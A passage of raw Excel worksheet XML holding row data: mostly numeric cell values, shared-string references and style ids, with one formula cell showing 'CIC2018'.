        <v>0</v>
      </c>
      <c r="ES15" s="108">
        <v>0</v>
      </c>
      <c r="ET15" s="109">
        <v>0</v>
      </c>
      <c r="EU15" s="110">
        <v>0</v>
      </c>
      <c r="EV15" s="501">
        <v>0</v>
      </c>
      <c r="EW15" s="111">
        <v>0</v>
      </c>
      <c r="EX15" s="111">
        <v>0</v>
      </c>
      <c r="EY15" s="112">
        <v>0</v>
      </c>
      <c r="EZ15" s="113">
        <v>5</v>
      </c>
      <c r="FA15" s="114" t="s">
        <v>2621</v>
      </c>
      <c r="FB15" s="503">
        <v>1</v>
      </c>
      <c r="FC15" s="115" t="s">
        <v>2622</v>
      </c>
      <c r="FD15" s="115">
        <v>1</v>
      </c>
      <c r="FE15" s="116">
        <v>1</v>
      </c>
      <c r="FF15" s="101">
        <v>0</v>
      </c>
      <c r="FG15" s="102">
        <v>0</v>
      </c>
      <c r="FH15" s="102">
        <v>0</v>
      </c>
      <c r="FI15" s="103">
        <v>0</v>
      </c>
      <c r="FJ15" s="103">
        <v>0</v>
      </c>
      <c r="FK15" s="104">
        <v>0</v>
      </c>
      <c r="FL15" s="105">
        <v>3</v>
      </c>
      <c r="FM15" s="106" t="s">
        <v>2628</v>
      </c>
      <c r="FN15" s="497">
        <v>3</v>
      </c>
      <c r="FO15" s="107" t="s">
        <v>2629</v>
      </c>
      <c r="FP15" s="107">
        <v>3</v>
      </c>
      <c r="FQ15" s="108">
        <v>1</v>
      </c>
      <c r="FR15" s="109">
        <v>3</v>
      </c>
      <c r="FS15" s="110" t="s">
        <v>2628</v>
      </c>
      <c r="FT15" s="501">
        <v>3</v>
      </c>
      <c r="FU15" s="111" t="s">
        <v>2629</v>
      </c>
      <c r="FV15" s="111">
        <v>3</v>
      </c>
      <c r="FW15" s="112">
        <v>1</v>
      </c>
      <c r="FX15" s="113">
        <v>0</v>
      </c>
      <c r="FY15" s="114">
        <v>0</v>
      </c>
      <c r="FZ15" s="503">
        <v>0</v>
      </c>
      <c r="GA15" s="115">
        <v>0</v>
      </c>
      <c r="GB15" s="115">
        <v>0</v>
      </c>
      <c r="GC15" s="116">
        <v>0</v>
      </c>
      <c r="GD15" s="250">
        <v>8</v>
      </c>
      <c r="GE15" s="251" t="s">
        <v>2630</v>
      </c>
      <c r="GF15" s="505">
        <v>6</v>
      </c>
      <c r="GG15" s="252" t="s">
        <v>2631</v>
      </c>
      <c r="GH15" s="252">
        <v>6</v>
      </c>
      <c r="GI15" s="253">
        <v>2</v>
      </c>
      <c r="GJ15" s="101">
        <v>8</v>
      </c>
      <c r="GK15" s="102" t="s">
        <v>2630</v>
      </c>
      <c r="GL15" s="102">
        <v>6</v>
      </c>
      <c r="GM15" s="103" t="s">
        <v>2631</v>
      </c>
      <c r="GN15" s="103">
        <v>6</v>
      </c>
      <c r="GO15" s="104">
        <v>2</v>
      </c>
      <c r="GP15" s="105">
        <v>0</v>
      </c>
      <c r="GQ15" s="106">
        <v>0</v>
      </c>
      <c r="GR15" s="497">
        <v>0</v>
      </c>
      <c r="GS15" s="107">
        <v>0</v>
      </c>
      <c r="GT15" s="107">
        <v>0</v>
      </c>
      <c r="GU15" s="108">
        <v>0</v>
      </c>
      <c r="GV15" s="109">
        <v>0</v>
      </c>
      <c r="GW15" s="110">
        <v>0</v>
      </c>
      <c r="GX15" s="501">
        <v>0</v>
      </c>
      <c r="GY15" s="111">
        <v>0</v>
      </c>
      <c r="GZ15" s="111">
        <v>0</v>
      </c>
      <c r="HA15" s="112">
        <v>0</v>
      </c>
      <c r="HB15" s="113">
        <v>3</v>
      </c>
      <c r="HC15" s="114" t="s">
        <v>2628</v>
      </c>
      <c r="HD15" s="503">
        <v>3</v>
      </c>
      <c r="HE15" s="115" t="s">
        <v>2629</v>
      </c>
      <c r="HF15" s="115">
        <v>3</v>
      </c>
      <c r="HG15" s="116">
        <v>1</v>
      </c>
      <c r="HH15" s="101">
        <v>0</v>
      </c>
      <c r="HI15" s="102">
        <v>0</v>
      </c>
      <c r="HJ15" s="102">
        <v>0</v>
      </c>
      <c r="HK15" s="103">
        <v>0</v>
      </c>
      <c r="HL15" s="103">
        <v>0</v>
      </c>
      <c r="HM15" s="104">
        <v>0</v>
      </c>
      <c r="HN15" s="105">
        <v>0</v>
      </c>
      <c r="HO15" s="106">
        <v>0</v>
      </c>
      <c r="HP15" s="497">
        <v>0</v>
      </c>
      <c r="HQ15" s="107">
        <v>0</v>
      </c>
      <c r="HR15" s="107">
        <v>0</v>
      </c>
      <c r="HS15" s="108">
        <v>0</v>
      </c>
      <c r="HT15" s="109">
        <v>0</v>
      </c>
      <c r="HU15" s="110">
        <v>0</v>
      </c>
      <c r="HV15" s="501">
        <v>0</v>
      </c>
      <c r="HW15" s="111">
        <v>0</v>
      </c>
      <c r="HX15" s="111">
        <v>0</v>
      </c>
      <c r="HY15" s="112">
        <v>0</v>
      </c>
      <c r="HZ15" s="113">
        <v>1</v>
      </c>
      <c r="IA15" s="114" t="s">
        <v>2632</v>
      </c>
      <c r="IB15" s="503">
        <v>1</v>
      </c>
      <c r="IC15" s="115" t="s">
        <v>2633</v>
      </c>
      <c r="ID15" s="115">
        <v>1</v>
      </c>
      <c r="IE15" s="116">
        <v>1</v>
      </c>
      <c r="IF15" s="250">
        <v>6</v>
      </c>
      <c r="IG15" s="251" t="s">
        <v>2634</v>
      </c>
      <c r="IH15" s="505">
        <v>2</v>
      </c>
      <c r="II15" s="252" t="s">
        <v>2635</v>
      </c>
      <c r="IJ15" s="252">
        <v>2</v>
      </c>
      <c r="IK15" s="253">
        <v>1</v>
      </c>
      <c r="IL15" s="101">
        <v>7</v>
      </c>
      <c r="IM15" s="102" t="s">
        <v>2636</v>
      </c>
      <c r="IN15" s="102">
        <v>3</v>
      </c>
      <c r="IO15" s="103" t="s">
        <v>2637</v>
      </c>
      <c r="IP15" s="103">
        <v>3</v>
      </c>
      <c r="IQ15" s="104">
        <v>2</v>
      </c>
      <c r="IR15" s="105">
        <v>0</v>
      </c>
      <c r="IS15" s="106">
        <v>0</v>
      </c>
      <c r="IT15" s="497">
        <v>0</v>
      </c>
      <c r="IU15" s="107">
        <v>0</v>
      </c>
      <c r="IV15" s="107">
        <v>0</v>
      </c>
      <c r="IW15" s="108">
        <v>0</v>
      </c>
      <c r="IX15" s="109">
        <v>0</v>
      </c>
      <c r="IY15" s="110">
        <v>0</v>
      </c>
      <c r="IZ15" s="501">
        <v>0</v>
      </c>
      <c r="JA15" s="111">
        <v>0</v>
      </c>
      <c r="JB15" s="111">
        <v>0</v>
      </c>
      <c r="JC15" s="112">
        <v>0</v>
      </c>
      <c r="JD15" s="113">
        <v>0</v>
      </c>
      <c r="JE15" s="114">
        <v>0</v>
      </c>
      <c r="JF15" s="503">
        <v>0</v>
      </c>
      <c r="JG15" s="115">
        <v>0</v>
      </c>
      <c r="JH15" s="115">
        <v>0</v>
      </c>
      <c r="JI15" s="116">
        <v>0</v>
      </c>
      <c r="JJ15" s="101">
        <v>0</v>
      </c>
      <c r="JK15" s="102">
        <v>0</v>
      </c>
      <c r="JL15" s="102">
        <v>0</v>
      </c>
      <c r="JM15" s="103">
        <v>0</v>
      </c>
      <c r="JN15" s="103">
        <v>0</v>
      </c>
      <c r="JO15" s="104">
        <v>0</v>
      </c>
      <c r="JP15" s="105">
        <v>0</v>
      </c>
      <c r="JQ15" s="106">
        <v>0</v>
      </c>
      <c r="JR15" s="497">
        <v>0</v>
      </c>
      <c r="JS15" s="107">
        <v>0</v>
      </c>
      <c r="JT15" s="107">
        <v>0</v>
      </c>
      <c r="JU15" s="108">
        <v>0</v>
      </c>
      <c r="JV15" s="109">
        <v>0</v>
      </c>
      <c r="JW15" s="110">
        <v>0</v>
      </c>
      <c r="JX15" s="501">
        <v>0</v>
      </c>
      <c r="JY15" s="111">
        <v>0</v>
      </c>
      <c r="JZ15" s="111">
        <v>0</v>
      </c>
      <c r="KA15" s="112">
        <v>0</v>
      </c>
      <c r="KB15" s="113">
        <v>0</v>
      </c>
      <c r="KC15" s="114">
        <v>0</v>
      </c>
      <c r="KD15" s="503">
        <v>0</v>
      </c>
      <c r="KE15" s="115">
        <v>0</v>
      </c>
      <c r="KF15" s="115">
        <v>0</v>
      </c>
      <c r="KG15" s="116">
        <v>0</v>
      </c>
      <c r="KH15" s="250">
        <v>0</v>
      </c>
      <c r="KI15" s="251">
        <v>0</v>
      </c>
      <c r="KJ15" s="505">
        <v>0</v>
      </c>
      <c r="KK15" s="252">
        <v>0</v>
      </c>
      <c r="KL15" s="252">
        <v>0</v>
      </c>
      <c r="KM15" s="253">
        <v>0</v>
      </c>
      <c r="KN15" s="101">
        <v>0</v>
      </c>
      <c r="KO15" s="102">
        <v>0</v>
      </c>
      <c r="KP15" s="102">
        <v>0</v>
      </c>
      <c r="KQ15" s="103">
        <v>0</v>
      </c>
      <c r="KR15" s="103">
        <v>0</v>
      </c>
      <c r="KS15" s="104">
        <v>0</v>
      </c>
      <c r="KT15" s="105">
        <v>0</v>
      </c>
      <c r="KU15" s="106">
        <v>0</v>
      </c>
      <c r="KV15" s="497">
        <v>0</v>
      </c>
      <c r="KW15" s="107">
        <v>0</v>
      </c>
      <c r="KX15" s="107">
        <v>0</v>
      </c>
      <c r="KY15" s="108">
        <v>0</v>
      </c>
      <c r="KZ15" s="109">
        <v>0</v>
      </c>
      <c r="LA15" s="110">
        <v>0</v>
      </c>
      <c r="LB15" s="501">
        <v>0</v>
      </c>
      <c r="LC15" s="111">
        <v>0</v>
      </c>
      <c r="LD15" s="111">
        <v>0</v>
      </c>
      <c r="LE15" s="112">
        <v>0</v>
      </c>
      <c r="LF15" s="113">
        <v>0</v>
      </c>
      <c r="LG15" s="114">
        <v>0</v>
      </c>
      <c r="LH15" s="503">
        <v>0</v>
      </c>
      <c r="LI15" s="115">
        <v>0</v>
      </c>
      <c r="LJ15" s="115">
        <v>0</v>
      </c>
      <c r="LK15" s="116">
        <v>0</v>
      </c>
      <c r="LL15" s="117">
        <v>2</v>
      </c>
      <c r="LM15" s="507">
        <v>2</v>
      </c>
      <c r="LN15" s="119">
        <v>0</v>
      </c>
      <c r="LO15" s="119">
        <v>2</v>
      </c>
      <c r="LP15" s="119">
        <v>1</v>
      </c>
      <c r="LQ15" s="119">
        <v>0</v>
      </c>
      <c r="LR15" s="119">
        <v>1</v>
      </c>
      <c r="LS15" s="119">
        <v>1</v>
      </c>
      <c r="LT15" s="382"/>
      <c r="LU15" s="117">
        <v>0</v>
      </c>
      <c r="LV15" s="118">
        <v>0</v>
      </c>
      <c r="LW15" s="507">
        <v>0</v>
      </c>
      <c r="LX15" s="119">
        <v>0</v>
      </c>
      <c r="LY15" s="119">
        <v>0</v>
      </c>
      <c r="LZ15" s="119">
        <v>0</v>
      </c>
      <c r="MA15" s="117">
        <v>0</v>
      </c>
      <c r="MB15" s="118">
        <v>0</v>
      </c>
      <c r="MC15" s="507">
        <v>0</v>
      </c>
      <c r="MD15" s="119">
        <v>0</v>
      </c>
      <c r="ME15" s="119">
        <v>0</v>
      </c>
      <c r="MF15" s="119">
        <v>0</v>
      </c>
      <c r="MG15" s="117">
        <v>0</v>
      </c>
      <c r="MH15" s="118">
        <v>0</v>
      </c>
      <c r="MI15" s="507">
        <v>0</v>
      </c>
      <c r="MJ15" s="119">
        <v>0</v>
      </c>
      <c r="MK15" s="119">
        <v>0</v>
      </c>
      <c r="ML15" s="119">
        <v>0</v>
      </c>
      <c r="MM15" s="117">
        <v>0</v>
      </c>
      <c r="MN15" s="118">
        <v>0</v>
      </c>
      <c r="MO15" s="507">
        <v>0</v>
      </c>
      <c r="MP15" s="119">
        <v>0</v>
      </c>
      <c r="MQ15" s="119">
        <v>0</v>
      </c>
      <c r="MR15" s="119">
        <v>0</v>
      </c>
      <c r="MS15" s="117">
        <v>0</v>
      </c>
      <c r="MT15" s="118">
        <v>0</v>
      </c>
      <c r="MU15" s="507">
        <v>0</v>
      </c>
      <c r="MV15" s="119">
        <v>0</v>
      </c>
      <c r="MW15" s="119">
        <v>0</v>
      </c>
      <c r="MX15" s="119">
        <v>0</v>
      </c>
      <c r="MY15" s="117">
        <v>0</v>
      </c>
      <c r="MZ15" s="118">
        <v>0</v>
      </c>
      <c r="NA15" s="507">
        <v>0</v>
      </c>
      <c r="NB15" s="119">
        <v>0</v>
      </c>
      <c r="NC15" s="119">
        <v>0</v>
      </c>
      <c r="ND15" s="119">
        <v>0</v>
      </c>
      <c r="NE15" s="117">
        <v>0</v>
      </c>
      <c r="NF15" s="118">
        <v>0</v>
      </c>
      <c r="NG15" s="507">
        <v>0</v>
      </c>
      <c r="NH15" s="119">
        <v>0</v>
      </c>
      <c r="NI15" s="119">
        <v>0</v>
      </c>
      <c r="NJ15" s="119">
        <v>0</v>
      </c>
      <c r="NK15" s="117">
        <v>1</v>
      </c>
      <c r="NL15" s="118" t="s">
        <v>4167</v>
      </c>
      <c r="NM15" s="507">
        <v>1</v>
      </c>
      <c r="NN15" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO15" s="119">
        <v>1</v>
      </c>
      <c r="NP15" s="119">
        <v>1</v>
      </c>
      <c r="NQ15" s="117">
        <v>0</v>
      </c>
      <c r="NR15" s="118">
        <v>0</v>
      </c>
      <c r="NS15" s="507">
        <v>0</v>
      </c>
      <c r="NT15" s="119">
        <v>0</v>
      </c>
      <c r="NU15" s="119">
        <v>0</v>
      </c>
      <c r="NV15" s="119">
        <v>0</v>
      </c>
      <c r="NW15" s="117">
        <v>1</v>
      </c>
      <c r="NX15" s="118" t="s">
        <v>4328</v>
      </c>
      <c r="NY15" s="507">
        <v>1</v>
      </c>
      <c r="NZ15" s="119" t="s">
        <v>2639</v>
      </c>
      <c r="OA15" s="119">
        <v>1</v>
      </c>
      <c r="OB15" s="119">
        <v>1</v>
      </c>
      <c r="OC15" s="120">
        <v>0</v>
      </c>
      <c r="OD15" s="120">
        <v>0</v>
      </c>
      <c r="OE15" s="120">
        <v>0</v>
      </c>
      <c r="OF15" s="121">
        <v>0</v>
      </c>
      <c r="OG15" s="120">
        <v>0</v>
      </c>
      <c r="OH15" s="120">
        <v>0</v>
      </c>
      <c r="OI15" s="120">
        <v>0</v>
      </c>
      <c r="OJ15" s="120">
        <v>0</v>
      </c>
      <c r="OK15" s="383"/>
      <c r="OL15" s="120">
        <v>0</v>
      </c>
      <c r="OM15" s="120">
        <v>0</v>
      </c>
      <c r="ON15" s="120">
        <v>0</v>
      </c>
      <c r="OO15" s="120"/>
      <c r="OP15" s="120">
        <v>0</v>
      </c>
      <c r="OQ15" s="464">
        <v>0</v>
      </c>
      <c r="OR15" s="120">
        <v>0</v>
      </c>
      <c r="OS15" s="120">
        <v>0</v>
      </c>
      <c r="OT15" s="120">
        <v>0</v>
      </c>
      <c r="OU15" s="120"/>
      <c r="OV15" s="120">
        <v>0</v>
      </c>
      <c r="OW15" s="464">
        <v>0</v>
      </c>
      <c r="OX15" s="120">
        <v>0</v>
      </c>
      <c r="OY15" s="120">
        <v>0</v>
      </c>
      <c r="OZ15" s="120">
        <v>0</v>
      </c>
      <c r="PA15" s="120"/>
      <c r="PB15" s="120">
        <v>0</v>
      </c>
      <c r="PC15" s="464">
        <v>0</v>
      </c>
      <c r="PD15" s="120">
        <v>0</v>
      </c>
      <c r="PE15" s="120">
        <v>0</v>
      </c>
      <c r="PF15" s="120">
        <v>0</v>
      </c>
      <c r="PG15" s="120"/>
      <c r="PH15" s="120">
        <v>0</v>
      </c>
      <c r="PI15" s="464">
        <v>0</v>
      </c>
      <c r="PJ15" s="120">
        <v>0</v>
      </c>
      <c r="PK15" s="120">
        <v>0</v>
      </c>
      <c r="PL15" s="120">
        <v>0</v>
      </c>
      <c r="PM15" s="120"/>
      <c r="PN15" s="120">
        <v>0</v>
      </c>
      <c r="PO15" s="464">
        <v>0</v>
      </c>
      <c r="PP15" s="120">
        <v>0</v>
      </c>
      <c r="PQ15" s="120">
        <v>0</v>
      </c>
      <c r="PR15" s="120">
        <v>0</v>
      </c>
      <c r="PS15" s="120"/>
      <c r="PT15" s="120">
        <v>0</v>
      </c>
      <c r="PU15" s="464">
        <v>0</v>
      </c>
      <c r="PV15" s="120">
        <v>0</v>
      </c>
      <c r="PW15" s="120">
        <v>0</v>
      </c>
      <c r="PX15" s="120">
        <v>0</v>
      </c>
      <c r="PY15" s="120"/>
      <c r="PZ15" s="120">
        <v>0</v>
      </c>
      <c r="QA15" s="464">
        <v>0</v>
      </c>
      <c r="QB15" s="120">
        <v>0</v>
      </c>
      <c r="QC15" s="120">
        <v>0</v>
      </c>
      <c r="QD15" s="120">
        <v>0</v>
      </c>
      <c r="QE15" s="120"/>
      <c r="QF15" s="120">
        <v>0</v>
      </c>
      <c r="QG15" s="464">
        <v>0</v>
      </c>
      <c r="QH15" s="120">
        <v>0</v>
      </c>
      <c r="QI15" s="120">
        <v>0</v>
      </c>
      <c r="QJ15" s="120">
        <v>0</v>
      </c>
      <c r="QK15" s="120"/>
      <c r="QL15" s="120">
        <v>0</v>
      </c>
      <c r="QM15" s="464">
        <v>0</v>
      </c>
      <c r="QN15" s="120">
        <v>0</v>
      </c>
      <c r="QO15" s="120">
        <v>0</v>
      </c>
      <c r="QP15" s="120">
        <v>0</v>
      </c>
      <c r="QQ15" s="120"/>
      <c r="QR15" s="120">
        <v>0</v>
      </c>
      <c r="QS15" s="464">
        <v>0</v>
      </c>
      <c r="QT15" s="184"/>
      <c r="QU15" s="184"/>
      <c r="QV15" s="184"/>
      <c r="QW15" s="184"/>
      <c r="QX15" s="184"/>
      <c r="QY15" s="184"/>
      <c r="QZ15" s="184"/>
      <c r="RA15" s="184"/>
      <c r="RB15" s="184"/>
      <c r="RC15" s="184"/>
      <c r="RD15" s="184"/>
      <c r="RE15" s="184"/>
      <c r="RF15" s="184"/>
      <c r="RG15" s="184"/>
      <c r="RH15" s="184"/>
      <c r="RI15" s="184"/>
      <c r="RJ15" s="184"/>
      <c r="RK15" s="184"/>
      <c r="RL15" s="184"/>
      <c r="RM15" s="184"/>
      <c r="RN15" s="184"/>
      <c r="RO15" s="184"/>
      <c r="RP15" s="184"/>
      <c r="RQ15" s="184"/>
      <c r="RR15" s="184"/>
      <c r="RS15" s="184"/>
      <c r="RT15" s="184"/>
      <c r="RU15" s="184"/>
      <c r="RV15" s="184"/>
      <c r="RW15" s="184"/>
      <c r="RX15" s="184"/>
      <c r="RY15" s="184"/>
      <c r="RZ15" s="184"/>
      <c r="SA15" s="184"/>
      <c r="SB15" s="184"/>
      <c r="SC15" s="184"/>
      <c r="SD15" s="184"/>
      <c r="SE15" s="184"/>
      <c r="SF15" s="184"/>
      <c r="SG15" s="184"/>
      <c r="SH15" s="184"/>
      <c r="SI15" s="184"/>
      <c r="SJ15" s="184"/>
      <c r="SK15" s="184"/>
      <c r="SL15" s="184"/>
      <c r="SM15" s="184"/>
      <c r="SN15" s="184"/>
      <c r="SO15" s="184"/>
      <c r="SP15" s="184"/>
      <c r="SQ15" s="184"/>
      <c r="SR15" s="184"/>
      <c r="SS15" s="184"/>
      <c r="ST15" s="184"/>
      <c r="SU15" s="184"/>
      <c r="SV15" s="184"/>
      <c r="SW15" s="184"/>
      <c r="SX15" s="184"/>
      <c r="SY15" s="184"/>
      <c r="SZ15" s="184"/>
      <c r="TA15" s="184"/>
      <c r="TB15" s="184"/>
      <c r="TC15" s="184"/>
      <c r="TD15" s="184"/>
      <c r="TE15" s="184"/>
      <c r="TF15" s="184"/>
      <c r="TG15" s="184"/>
      <c r="TH15" s="184"/>
      <c r="TI15" s="184"/>
      <c r="TJ15" s="184"/>
      <c r="TK15" s="184"/>
      <c r="TL15" s="184"/>
      <c r="TM15" s="184"/>
      <c r="TN15" s="184"/>
      <c r="TO15" s="184"/>
      <c r="TP15" s="184"/>
      <c r="TQ15" s="184"/>
      <c r="TR15" s="184"/>
      <c r="TS15" s="184"/>
      <c r="TT15" s="184"/>
      <c r="TU15" s="184"/>
      <c r="TV15" s="184"/>
      <c r="TW15" s="184"/>
      <c r="TX15" s="184"/>
      <c r="TY15" s="184"/>
      <c r="TZ15" s="184"/>
      <c r="UA15" s="184"/>
      <c r="UB15" s="184"/>
      <c r="UC15" s="184"/>
      <c r="UD15" s="184"/>
      <c r="UE15" s="184"/>
      <c r="UF15" s="184"/>
      <c r="UG15" s="184"/>
      <c r="UH15" s="184"/>
      <c r="UI15" s="184"/>
      <c r="UJ15" s="184"/>
      <c r="UK15" s="184"/>
      <c r="UL15" s="184"/>
      <c r="UM15" s="184"/>
      <c r="UN15" s="184"/>
      <c r="UO15" s="184"/>
      <c r="UP15" s="184"/>
      <c r="UQ15" s="184"/>
      <c r="UR15" s="184"/>
      <c r="US15" s="184"/>
      <c r="UT15" s="184"/>
      <c r="UU15" s="184"/>
      <c r="UV15" s="184"/>
      <c r="UW15" s="184"/>
      <c r="UX15" s="184"/>
      <c r="UY15" s="184"/>
      <c r="UZ15" s="184"/>
      <c r="VA15" s="184"/>
      <c r="VB15" s="184"/>
      <c r="VC15" s="184"/>
      <c r="VD15" s="184"/>
      <c r="VE15" s="184"/>
      <c r="VF15" s="184"/>
      <c r="VG15" s="184"/>
      <c r="VH15" s="184"/>
      <c r="VI15" s="184"/>
      <c r="VJ15" s="184"/>
      <c r="VK15" s="184"/>
      <c r="VL15" s="184"/>
      <c r="VM15" s="184"/>
      <c r="VN15" s="184"/>
      <c r="VO15" s="184"/>
      <c r="VP15" s="184"/>
      <c r="VQ15" s="184"/>
      <c r="VR15" s="184"/>
      <c r="VS15" s="184"/>
      <c r="VT15" s="184"/>
      <c r="VU15" s="184"/>
      <c r="VV15" s="184"/>
      <c r="VW15" s="184"/>
      <c r="VX15" s="184"/>
      <c r="VY15" s="184"/>
    </row>
    <row r="16" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A16" s="82" t="s">
        <v>17</v>
      </c>
      <c r="B16" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C16" s="83" t="s">
        <v>315</v>
      </c>
      <c r="D16" s="83" t="s">
        <v>37</v>
      </c>
      <c r="E16" s="83">
        <f t="shared" si="2"/>
        <v>13</v>
      </c>
      <c r="F16" s="83" t="s">
        <v>38</v>
      </c>
      <c r="G16" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H16" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I16" s="81" t="s">
        <v>879</v>
      </c>
      <c r="J16" s="85" t="s">
        <v>4</v>
      </c>
      <c r="K16" s="81" t="s">
        <v>880</v>
      </c>
      <c r="L16" s="81" t="s">
        <v>881</v>
      </c>
      <c r="M16" s="378" t="s">
        <v>281</v>
      </c>
      <c r="N16" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O16" s="485" t="str">
        <f t="shared" si="1"/>
        <v>CIC2018</v>
      </c>
      <c r="P16" s="91"/>
      <c r="Q16" s="379" t="s">
        <v>882</v>
      </c>
      <c r="R16" s="92" t="s">
        <v>883</v>
      </c>
      <c r="S16" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T16" s="92" t="s">
        <v>884</v>
      </c>
      <c r="U16" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V16" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W16" s="96" t="s">
        <v>885</v>
      </c>
      <c r="X16" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y16" s="83" t="s">
        <v>887</v>
      </c>
      <c r="Z16" s="98" t="s">
        <v>886</v>
      </c>
      <c r="AA16" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB16" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC16" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD16" s="83"/>
      <c r="AE16" s="83"/>
      <c r="AF16" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG16" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH16" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI16" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ16" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK16" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL16" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM16" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN16" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO16" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP16" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ16" s="358">
        <v>2</v>
      </c>
      <c r="AR16" s="100"/>
      <c r="AS16" s="100">
        <v>1</v>
      </c>
      <c r="AT16" s="100">
        <v>1</v>
      </c>
      <c r="AU16" s="100">
        <v>2</v>
      </c>
      <c r="AV16" s="92" t="s">
        <v>888</v>
      </c>
      <c r="AW16" s="100">
        <v>1</v>
      </c>
      <c r="AX16" s="100">
        <v>1</v>
      </c>
      <c r="AY16" s="100">
        <v>1</v>
      </c>
      <c r="AZ16" s="100">
        <v>2</v>
      </c>
      <c r="BA16" s="381" t="s">
        <v>4870</v>
      </c>
      <c r="BB16" s="101">
        <v>6</v>
      </c>
      <c r="BC16" s="102" t="s">
        <v>1797</v>
      </c>
      <c r="BD16" s="102">
        <v>2</v>
      </c>
      <c r="BE16" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF16" s="103">
        <v>1</v>
      </c>
      <c r="BG16" s="104">
        <v>2</v>
      </c>
      <c r="BH16" s="105">
        <v>4</v>
      </c>
      <c r="BI16" s="106" t="s">
        <v>1844</v>
      </c>
      <c r="BJ16" s="497">
        <v>4</v>
      </c>
      <c r="BK16" s="107" t="s">
        <v>1845</v>
      </c>
      <c r="BL16" s="107">
        <v>2</v>
      </c>
      <c r="BM16" s="108">
        <v>2</v>
      </c>
      <c r="BN16" s="109">
        <v>10</v>
      </c>
      <c r="BO16" s="110" t="s">
        <v>1986</v>
      </c>
      <c r="BP16" s="501">
        <v>6</v>
      </c>
      <c r="BQ16" s="111" t="s">
        <v>1987</v>
      </c>
      <c r="BR16" s="111">
        <v>3</v>
      </c>
      <c r="BS16" s="112">
        <v>2</v>
      </c>
      <c r="BT16" s="113">
        <v>8</v>
      </c>
      <c r="BU16" s="114" t="s">
        <v>2641</v>
      </c>
      <c r="BV16" s="503">
        <v>4</v>
      </c>
      <c r="BW16" s="115" t="s">
        <v>2642</v>
      </c>
      <c r="BX16" s="115">
        <v>2</v>
      </c>
      <c r="BY16" s="116">
        <v>2</v>
      </c>
      <c r="BZ16" s="250">
        <v>20</v>
      </c>
      <c r="CA16" s="251" t="s">
        <v>2643</v>
      </c>
      <c r="CB16" s="505">
        <v>8</v>
      </c>
      <c r="CC16" s="252" t="s">
        <v>2644</v>
      </c>
      <c r="CD16" s="252">
        <v>4</v>
      </c>
      <c r="CE16" s="253">
        <v>2</v>
      </c>
      <c r="CF16" s="101">
        <v>28</v>
      </c>
      <c r="CG16" s="102" t="s">
        <v>2078</v>
      </c>
      <c r="CH16" s="102">
        <v>12</v>
      </c>
      <c r="CI16" s="103" t="s">
        <v>2079</v>
      </c>
      <c r="CJ16" s="103">
        <v>6</v>
      </c>
      <c r="CK16" s="104">
        <v>2</v>
      </c>
      <c r="CL16" s="105">
        <v>0</v>
      </c>
      <c r="CM16" s="106">
        <v>0</v>
      </c>
      <c r="CN16" s="497">
        <v>0</v>
      </c>
      <c r="CO16" s="107">
        <v>0</v>
      </c>
      <c r="CP16" s="107">
        <v>0</v>
      </c>
      <c r="CQ16" s="108">
        <v>0</v>
      </c>
      <c r="CR16" s="109">
        <v>0</v>
      </c>
      <c r="CS16" s="110">
        <v>0</v>
      </c>
      <c r="CT16" s="501">
        <v>0</v>
      </c>
      <c r="CU16" s="111">
        <v>0</v>
      </c>
      <c r="CV16" s="111">
        <v>0</v>
      </c>
      <c r="CW16" s="112">
        <v>0</v>
      </c>
      <c r="CX16" s="113">
        <v>10</v>
      </c>
      <c r="CY16" s="114" t="s">
        <v>1986</v>
      </c>
      <c r="CZ16" s="503">
        <v>6</v>
      </c>
      <c r="DA16" s="115" t="s">
        <v>1987</v>
      </c>
      <c r="DB16" s="115">
        <v>3</v>
      </c>
      <c r="DC16" s="116">
        <v>2</v>
      </c>
      <c r="DD16" s="101">
        <v>0</v>
      </c>
      <c r="DE16" s="102">
        <v>0</v>
      </c>
      <c r="DF16" s="102">
        <v>0</v>
      </c>
      <c r="DG16" s="103">
        <v>0</v>
      </c>
      <c r="DH16" s="103">
        <v>0</v>
      </c>
      <c r="DI16" s="104">
        <v>0</v>
      </c>
      <c r="DJ16" s="105">
        <v>2</v>
      </c>
      <c r="DK16" s="106" t="s">
        <v>2645</v>
      </c>
      <c r="DL16" s="497">
        <v>2</v>
      </c>
      <c r="DM16" s="107" t="s">
        <v>2646</v>
      </c>
      <c r="DN16" s="107">
        <v>1</v>
      </c>
      <c r="DO16" s="108">
        <v>2</v>
      </c>
      <c r="DP16" s="109">
        <v>2</v>
      </c>
      <c r="DQ16" s="110" t="s">
        <v>2645</v>
      </c>
      <c r="DR16" s="501">
        <v>2</v>
      </c>
      <c r="DS16" s="111" t="s">
        <v>2646</v>
      </c>
      <c r="DT16" s="111">
        <v>1</v>
      </c>
      <c r="DU16" s="112">
        <v>2</v>
      </c>
      <c r="DV16" s="113">
        <v>2</v>
      </c>
      <c r="DW16" s="114" t="s">
        <v>2647</v>
      </c>
      <c r="DX16" s="503">
        <v>2</v>
      </c>
      <c r="DY16" s="115" t="s">
        <v>2648</v>
      </c>
      <c r="DZ16" s="115">
        <v>1</v>
      </c>
      <c r="EA16" s="116">
        <v>2</v>
      </c>
      <c r="EB16" s="250">
        <v>4</v>
      </c>
      <c r="EC16" s="251" t="s">
        <v>2649</v>
      </c>
